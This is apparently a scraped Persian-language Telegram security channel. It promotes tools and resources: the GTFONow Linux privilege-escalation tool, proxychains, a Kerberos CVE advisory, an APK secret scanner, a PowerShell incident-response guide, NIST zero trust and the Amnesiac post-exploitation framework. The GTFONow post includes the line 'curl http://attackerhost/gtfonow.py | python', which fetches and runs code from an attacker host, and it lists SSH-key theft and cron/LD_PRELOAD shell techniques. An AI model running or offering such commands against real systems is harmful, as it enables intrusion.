⭕️ به منظور خودکارسازی فرایند Privesc در سیستم های لینوکس و یونیکس، یک ابزار توسعه داده شده است که در دستهبندی Missconfig های setuid/setgid و sudo permission ها و ... تمرکز دارد. این ابزار عمدتاً برای مسابقات CTF طراحی شده است، اما در محیط های واقعی نیز قابل استفاده است.
#RedTeam #Privesc #bypass
@Engineer_Computer
Features
Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python
#RedTeam #Privesc #bypass
@Engineer_Computer
GitHub
GitHub - Frissi0n/GTFONow: Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins. - Frissi0n/GTFONow
🔸برنامه سبک ساده و سریع پروکسی ساکس برای ترمینال و برنامههای ترمینالی
🔹بدون نیاز به سرویس
♦️برای اتصال به نکوری:
خط آخر پورت را به 2080 تغییر دهید.
شیوهی کار:
لینکها:
👉🔗 Github
👉🔗 Arch Extra Repo
👉🔗 Wiki
#نکته #لینوکس #معرفی #آموزش
@Engineer_Computer
🔹بدون نیاز به سرویس
♦️برای اتصال به نکوری:
sudo vi /etc/proxychains.conf
خط آخر پورت را به 2080 تغییر دهید.
socks4 127.0.0.1 2080
شیوهی کار:
proxychains COMMAND
لینکها:
👉🔗 Github
👉🔗 Arch Extra Repo
👉🔗 Wiki
#نکته #لینوکس #معرفی #آموزش
@Engineer_Computer
GitHub
GitHub - rofl0r/proxychains-ng: proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked…
proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained p...
آسیب پذیری خطرناک در ویندوز
وصله کنید
@Engineer_Computer
a Windows Kerberos security feature bypass vulnerability that allows attackers to bypass authentication mechanisms and launch impersonation attacks. Attackers can exploit this flaw via a machine-in-the-middle (MitM) attack.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20674
وصله کنید
@Engineer_Computer
a Windows Kerberos security feature bypass vulnerability that allows attackers to bypass authentication mechanisms and launch impersonation attacks. Attackers can exploit this flaw via a machine-in-the-middle (MitM) attack.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20674
اینطور هست که اطلاعات حساس از برنامه های اندروئید بیرون کشیده میشوند
@Engineer_Computer
https://github.com/effortlessdevsec/ApkRecon
@Engineer_Computer
https://github.com/effortlessdevsec/ApkRecon
GitHub
GitHub - effortlessdevsec/ApkRecon: Scanning APK file for URIs, endpoints & secrets.
Scanning APK file for URIs, endpoints & secrets. Contribute to effortlessdevsec/ApkRecon development by creating an account on GitHub.
تمرین
مدیریت حادثه با پاورشل
با یک ویروس نمونه
@Engineer_Computer
https://www.securityinbits.com/incident-response/powershell-commands-for-incident-response/
مدیریت حادثه با پاورشل
با یک ویروس نمونه
@Engineer_Computer
https://www.securityinbits.com/incident-response/powershell-commands-for-incident-response/
Securityinbits
PowerShell Commands for Incident Response - Securityinbits
We will learn different PowerShell Commands can be used in Incident Response to remediate the machine. I will take a scenario where a machine is infected with NanoCore malware to explain this PowerShell Commands.
Pentesting Checklist.pdf
1001.3 KB
Pentesting Checklist
@Engineer_Computer
@Engineer_Computer
NIST.SP.800-207.pdf
944.2 KB
استاندارد NIST در مورد زیرو تراست
@Engineer_Computer
@Engineer_Computer
کانال یوتیوب برای آموزش رایگان امنیت سیستم های کنترل صنعتی
@Engineer_Computer
از افزونه های هوش مصنوعی و زیر نویس برای درک بیشتر کمک بگیرید
** یکی از افزونه های جالب ، خلاصه نویس ویدئو میباشد که کمک میکند در اولین نگاه ، کلیت ویدئو بدستتان بیاید
https://m.youtube.com/channel/UCKO03V8KB-kgWedXTFdaEHA?cbrd=1
@Engineer_Computer
از افزونه های هوش مصنوعی و زیر نویس برای درک بیشتر کمک بگیرید
** یکی از افزونه های جالب ، خلاصه نویس ویدئو میباشد که کمک میکند در اولین نگاه ، کلیت ویدئو بدستتان بیاید
https://m.youtube.com/channel/UCKO03V8KB-kgWedXTFdaEHA?cbrd=1
دو نکته را در لینک زیر بیابید:
استفاده از سرویس به روزرسانی ویندوز برای تکمیل زنجیره حمله
نحوه و روشهای تشخیص گروههای APT که انجام دهنده نفوذ هستند ( دلایل انتساب ویروس و حمله به APT خاص)
@Engineer_Computer
https://thehackernews.com/2022/01/north-korean-hackers-using-windows.html?m=1
استفاده از سرویس به روزرسانی ویندوز برای تکمیل زنجیره حمله
نحوه و روشهای تشخیص گروههای APT که انجام دهنده نفوذ هستند ( دلایل انتساب ویروس و حمله به APT خاص)
@Engineer_Computer
https://thehackernews.com/2022/01/north-korean-hackers-using-windows.html?m=1
مقاله ای دارای امتیاز آموزشی برای دارندگان مدرک از سازمان ISC2
@Engineer_Computer
https://sosafe-awareness.com/resources/reports/the-biggest-challenges-for-security-leaders/?utm_term=cyber%20challenges&utm_campaign=DACH_EN_Non-branded_Q12023&utm_source=googlesearch&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19642365313&hsa_grp=150586726490&hsa_ad=679712642136&hsa_src=g&hsa_tgt=kwd-298672121030&hsa_kw=cyber%20challenges&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gad_source=1&gclid=Cj0KCQiAwP6sBhDAARIsAPfK_wZQZemuY-9le45dGMrVbL6oLYa9a8oeYaCEjWfonng8iy4-vC_AJzsaApRUEALw_wcB
@Engineer_Computer
https://sosafe-awareness.com/resources/reports/the-biggest-challenges-for-security-leaders/?utm_term=cyber%20challenges&utm_campaign=DACH_EN_Non-branded_Q12023&utm_source=googlesearch&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19642365313&hsa_grp=150586726490&hsa_ad=679712642136&hsa_src=g&hsa_tgt=kwd-298672121030&hsa_kw=cyber%20challenges&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gad_source=1&gclid=Cj0KCQiAwP6sBhDAARIsAPfK_wZQZemuY-9le45dGMrVbL6oLYa9a8oeYaCEjWfonng8iy4-vC_AJzsaApRUEALw_wcB
SoSafe
The Biggest Challenges for Security Leaders | White Paper
Join top cyber experts in our latest white paper, shaping the future of cybersecurity with valuable insights. Read now.
فریم ورک برای عمق بخشیدن به نفوذ بدون نیاز به نصب ابزار - اجرا در حافظه
@Engineer_Computer
Command Execution over Named-Pipes (SMB)
https://github.com/Leo4j/Amnesiac
@Engineer_Computer
Command Execution over Named-Pipes (SMB)
https://github.com/Leo4j/Amnesiac
GitHub
GitHub - Leo4j/Amnesiac: Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with lateral…
Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with lateral movement within Active Directory environments - Leo4j/Amnesiac
معماران امنیت بخوانند
@Engineer_Computer
Threat Modeling is critical to achieving design goals for system security and data privacy.
This document provides a catalog of capabilities to help you cultivate value from your Threat Modeling practice.
https://www.threatmodelingmanifesto.org/capabilities/
@Engineer_Computer
Threat Modeling is critical to achieving design goals for system security and data privacy.
This document provides a catalog of capabilities to help you cultivate value from your Threat Modeling practice.
https://www.threatmodelingmanifesto.org/capabilities/
www.threatmodelingmanifesto.org
Threat Modeling Capabilities
Documents a catalog of capabilities to help you cultivate value from your Threat Modeling practice.